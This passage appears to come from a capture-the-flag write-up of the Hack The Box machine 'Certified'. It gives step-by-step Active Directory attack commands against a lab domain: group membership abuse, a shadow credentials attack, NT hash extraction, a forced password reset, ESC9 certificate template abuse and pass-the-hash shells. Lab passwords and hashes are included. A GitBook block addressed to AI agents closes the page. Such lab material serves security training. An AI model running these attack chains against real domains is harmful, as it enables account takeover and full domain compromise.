Now `judith.mader` has permission to add herself to the group. For this we use [bloodyAD](https://github.com/CravateRouge/bloodyAD). {% code overflow="wrap" %} ```bash > python3 /home/kali/.local/bin/bloodyAD -d certified.htb -u judith.mader -p judith09 --host 10.10.11.41 add groupMember Management judith.mader ``` {% endcode %}
We have taken ownership of `management@certified.htb` group and added ourselves as a member. We mark this as "Owned" in BHCE and continue enumerating from there. The group has another member, the user `management_svc`, over which we have *GenericWrite* permissions as group owners. Again, by clicking on the edge, the tool suggests possible ways to abuse this.
We see the possibility of launching a [shadow credentials attack](https://i-tracing.com/blog/dacl-shadow-credentials/) with [pyWhisker](https://github.com/ShutdownRepo/pywhisker). In summary, in a shadow credentials attack, the attacker populates the `msDS-KeyCredentialLink` attribute on the targeted account, for which *GenericAll* or *GenericWrite* is needed. Then the attacker requests a PFX certificate for this target user, that is used to authenticate and request either a TGT or the target's NT hash. Both of them allow to get a shell under the context of the target account. Let's start by populating the attribute with `pywhisker.py`. First we check current status of the attribute. {% code overflow="wrap" %} ```bash > python3 ./pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target management_svc --action "list" ``` {% endcode %}
It seems the attribute is empty, let's populate it. {% code overflow="wrap" %} ```bash > python3 ./pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target management_svc --action "add" ``` {% endcode %}
The tool generates a PFX file containing a certificate and a private, and suggests we can use with [PKINITtools](https://github.com/dirkjanm/PKINITtools). The procedure explaining how to request a TGT ticket with `gettgtpkinit.py` and a PEM certificate is explained at[ pyWhisker GitHub repository](https://github.com/ShutdownRepo/pywhisker#example-with-the-pem-format). In our case we have a PFX certificate, but only a minor modification to the command is needed. Before using the tool PKINITtools, it is needed to manually install a dependency Minikerberos. ```bash > git clone https://github.com/skelsec/minikerberos.git > cd minikerberos > sudo python3 setup.py install ``` Now let's request a TGT ticket for `managemenet_svc` using the PFX certificate and `gettgtpkinit.py`. As always when requesting TGT tickets, remember to synchronize clock to avoid skew errors. {% code overflow="wrap" %} ```bash > sudo ntpdate -u certified.htb && python3 ./gettgtpkinit.py -cert-pfx ../vf1j2lD5.pfx -pfx-pass grcbM93st8xX2VVWxOYM certified.htb/management_svc g1vi.ccache ``` {% endcode %}
Ticket has been saved. Export it for use. ```bash > export KRB5CCNAME=./g1vi.ccache ``` And use it to retrieve `management_svc` NT hash. {% code overflow="wrap" %} ```bash > sudo ntpdate -u certified.htb && python3 ./getnthash.py -key 2c8b51c6b563a9653a3997f848e02fe56a4d048a8df30da5f85e660b03169d66 certified.htb/management_svc ``` {% endcode %}
The only thing that's left is to open a shell as `management_svc` ```bash > evil-winrm -u management_svc -H -i certified.htb ```
And collect the user flag. ## SYSTEM Start from the `management_svc` shell and take the opportunity to enumerate the system. ```powershell Get-ComputerInfo WindowsBuildLabEx : 17763.1.amd64fre.rs5_release.180914-1434 WindowsCurrentVersion : 6.3 WindowsProductName : Windows Server 2019 Standard WindowsVersion : 1809 ``` Enumerate the user in BHCE, we see it has *GenericAll* over another user `ca_operator`. Clicking over the edge the application suggest an abuse path, including a force password change.
We can do a shadow credentials attack again, or force a [password change with bloodyAD](https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword). {% code overflow="wrap" %} ```bash > python3 /home/kali/.local/bin/bloodyAD -d certified.htb -u management_svc -p :a091c1832bcdd4677c28b5a6a1295584 --host 10.10.11.41 set password ca_operator 'password' ``` {% endcode %}
The new credential does not work for Evil-WinRM, but we can check the password has been successfully changed via SMB. ```bash > smbmap -H certified.htb -P 445 -u ca_operator -p password [+] IP: certified.htb:445 Name: unknown Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share SYSVOL READ ONLY Logon server share ``` The username `ca_operator` strongly suggests AD CS is running on the machine. Since we cannot have a local shell as `ca_operator` we cannot enumerate templates with `certify.exe`, but we can do it remotely with Certipy as we did in [Authority](/book/hack-the-box/release-arena/authority.md). {% code overflow="wrap" %} ```bash > certipy find -username ca_operator@certified.htb -password password -dc-ip 10.10.11.41 -vulnerable -stdout ``` {% endcode %} Which reports there is a template `CertifiedAuthentication` vulnerable to ESC9.
These ESC codes are given following the terminology used in the [original AD CS abuse whitepaper](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf) that initially described 8 different domain escalation attacks, and were later expanded by [subsequent researches](https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html). Let's abuse ESC9 following [the researcher's step-by-step](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7). We comply with the requirements for this attack since `management_svc` has has *GenericWrite* over `ca_operator`, who in turn is allowed to enroll in the certificate template ESC9, that contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value. Following the guide, first we change `ca_operator` UPN to "Administrator", using `management_svc` credentials (in this case `management_svc` hash is used for authentication). {% code overflow="wrap" %} ```bash > certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator ``` {% endcode %}
Now, we request the vulnerable certificate template ESC9 as `ca_operator` {% code overflow="wrap" %} ```bash > certipy req -username ca_operator@certified.htb -p password -ca certified-DC01-CA -template CertifiedAuthentication -debug ``` {% endcode %}
Next, modify again the `ca_operator` UPN so there is no mismatch errors in the next step. {% code overflow="wrap" %} ```bash > certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb ``` {% endcode %}
Finally, we try to authenticate with the certificate so we receive the NT hash of the Administrator. You will need to add domain since there is no domain specified in the certificate. Also, we have to deal with skew errors, stopping the `timedatectl` auto synchronization, and synchronizing manually with `rdate` ```bash > sudo timedatectl set-ntp off > sudo rdate -n 10.10.11.41 Sat Jan 11 04:36:07 GMT 2025 ``` Now, we can run `certipy` to request a TGT and retrieve the Administrator NT hash. ```bash > certipy auth -pfx administrator.pfx -domain certified.htb ```
An use it to open a shell.
You are root. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://allthewriteups.gitbook.io/book/hack-the-box/release-arena/certified.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.